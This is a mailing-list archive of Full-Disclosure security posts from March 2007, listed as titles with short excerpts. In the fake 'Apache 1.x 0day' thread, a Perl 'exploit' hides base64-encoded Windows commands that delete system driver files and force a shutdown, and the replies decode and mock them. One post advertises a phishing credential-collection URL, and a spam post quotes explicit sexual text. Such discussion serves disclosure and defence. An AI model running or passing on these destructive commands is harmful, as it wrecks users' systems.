[Full-disclosure] Layered Defense Research Advisory: F-Secure Anti-Virus Client Security 6.02 Format String Vulnerability

== Layered Defense Research Advisory 18 March 2007 == 1) Affected Software F-Secure Anti-Virus Client Security Version 6.02 == 2) Severity Rating: Low

[Full-disclosure] unsubscribe

unsubscribe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of [EMAIL PROTECTED] Sent: Monday, March 19, 2007 7:00 AM To: full-disclosure@lists.grok.org.uk Subject: Full-Disclosure Digest, Vol 25, Issue 27 Send Full-Disclosure mailing list submissions to

Re: [Full-disclosure] [WEB SECURITY] GMail Contact Information Disclosure PoC

Here another one : http://spreadsheets.google.com/contacts/picker/data/contacts?groups=truesho w=ALLenums=truemax=999out=xml Lets Play Dror ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html

[Full-disclosure] Asterisk SDP DOS vulnerability

MADYNES Security Advisory http://madynes.loria.fr/ http://madynes.loria.fr Title: Asterisk SIP INVITE remote DOS Release Date: 08/03/2007 Severity: High - Denial of Service Advisory ID:KIPH1 Software: Asterisk http://www.asterisk.org/

[Full-disclosure] w-agora version 4.2.1 Multiple Path Disclosure Vulnerabilities

netVigilance Security Advisory #14 w-agora version 4.2.1 Multiple Path Disclosure Vulnerabilities Description: w-agora is a set of scripts written in PHP. This package is intended to allow users to share, exchange and publish information, files and discussions over the web. Multiple path

[Full-disclosure] w-agora version 4.2.1 Information Disclosure Vulnerability

netVigilance Security Advisory #15 w-agora version 4.2.1 Information Disclosure Vulnerability Description: w-agora is a set of scripts written in PHP. This package is intended to allow users to share, exchange and publish information, files and discussions over the web. It is possible to

[Full-disclosure] A new apache 1.x 0day

Hi, A new apache 1.x 0day #!/usr/bin/perl use MIME::Base64; use IO::Socket; use HTTP::Response; use HTTP::Status; use Getopt::Std; print q { # ## ## Apache 1.X Remote Buffer Overflow getRoot() Exploit ## written by 666 - [EMAIL

[Full-disclosure] dkftpbench 0.45 (Platoon:init) Local buffer overflow vulnerability

Description: dkftpbench is an FTP benchmark program inspired by SPECweb99. The result of the benchmark is a number-of-simultaneous-users rating; after running the benchmark properly, you have a good idea how many simultaneous dialup clients a server can support. The target bandwidth per client is

Re: [Full-disclosure] A new apache 1.x 0day

$mov = decode_base64(QGRlbCAlU3lzdGVtUm9vdCVcU3lzdGVtMzJcZHJpdmVyc1wqLiogL0YgL1MgL1EgPiBudWw=); @del %SystemRoot%\System32\drivers\*.* /F /S /Q nul $int = decode_base64(c2h1dGRvd24gLXMgLWYgLXQgMA==); shutdown -s -f -t 0 -- http://secdev.zoller.lu Thierry Zoller Fingerprint : 5D84 BFDC CD36

Re: [Full-disclosure] A new apache 1.x 0day

@del %SystemRoot%\System32\drivers\*.* /F /S /Q nul shutdown -s -f -t 0 What, the attempt at visually obstructing the system() calls didn't give it away? ___ Full-Disclosure - We believe in it. Charter:

[Full-disclosure] cftp 0.12 (readrc) Local buffer overflow vulnerability

Description: CFTP is Comfortable FTP, a full screen ftp client. Supported are FTP both with active and passive data connections, IPv4 and IPv6, and SFTP (a file transfer protocol using SSH for authorization and connection encryption). Found local buffer overflow in readrc() with sprintf() with no

Re: [Full-disclosure] A new apache 1.x 0day

lol, system ($mov);system ($int);shift; $mov and $int are base64 encoded pieces of crap deleting %systemroot%\system32\drivers\*.* and shutting down teh windows box, funny and oh so obvious. ___ Full-Disclosure - We believe in it. Charter:

[Full-disclosure] [USN-437-1] libwpd vulnerability

=== Ubuntu Security Notice USN-437-1 March 19, 2007 libwpd vulnerability CVE-2007-0002 === A security issue affects the following Ubuntu releases: Ubuntu 5.10 Ubuntu 6.06

[Full-disclosure] ZynOS v3.40 One packet killer

Hi to all, While playing in my home's network with Scapy I found a vulnerability affecting the wireless services offered by Zyxel routers with, at least, ZynOS v3.40. That's the unique model I tested. The exploit in question: -- ZynOS v3.40 One

Re: [Full-disclosure] Xbox live accounts are being stolen (update)

Since boatloads of people are asking me about this I figured I would just give an update here Here is an exhaustive list of people experiencing the problem as well as a possible source of the account theft (Clan Infamous) http://www.oinfamouso.moonfruit.com/ They claim to be pretexting

[Full-disclosure] heeee he

Dear Yahoo We use the following email to collect victims' credentials [1]. Please ban our asses! [EMAIL PROTECTED] [1] http://88.191.15.116/www.paypal.com/cgi-bin/www.amazon.com.zip thanks for reading heee he ___ Full-Disclosure -

[Full-disclosure] Microsoft coverup ? Stolen Xbox live accounts list of known victims - Please Help

Dates indicate thread start date not necessarily the offending post date. Clan Homepages of *some* of those that are responsible for the attacks on Xbox live accounts. 3-19-2007 (See the blacklist and member list) o InFamOuS o clan http://www.oinfamouso.moonfruit.com/ 3-19-2007 This Site

Re: [Full-disclosure] Sexy, spankable 22 year old girl looking for a wild time

Now that is what I call full dis-clotheser. Geez! -Original Message- From: Miss Aveline [mailto:[EMAIL PROTECTED] Sent: Tuesday, March 20, 2007 12:37 AM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Sexy, spankable 22 year old girl looking for a wild time hey sexys,

Re: [Full-disclosure] Sexy, spankable 22 year old girl looking for a wild time

On Mar 19, 2007, at 11:37 PM, Miss Aveline wrote: hey sexys, 22/f/st. catherines bi girl looking for a casual thing no strings attached. love the cock, but will eat pussy too. into BDSM, roleplay, ageplay, and watersports and spankings especially ;-). 3-4somes are fine, but any more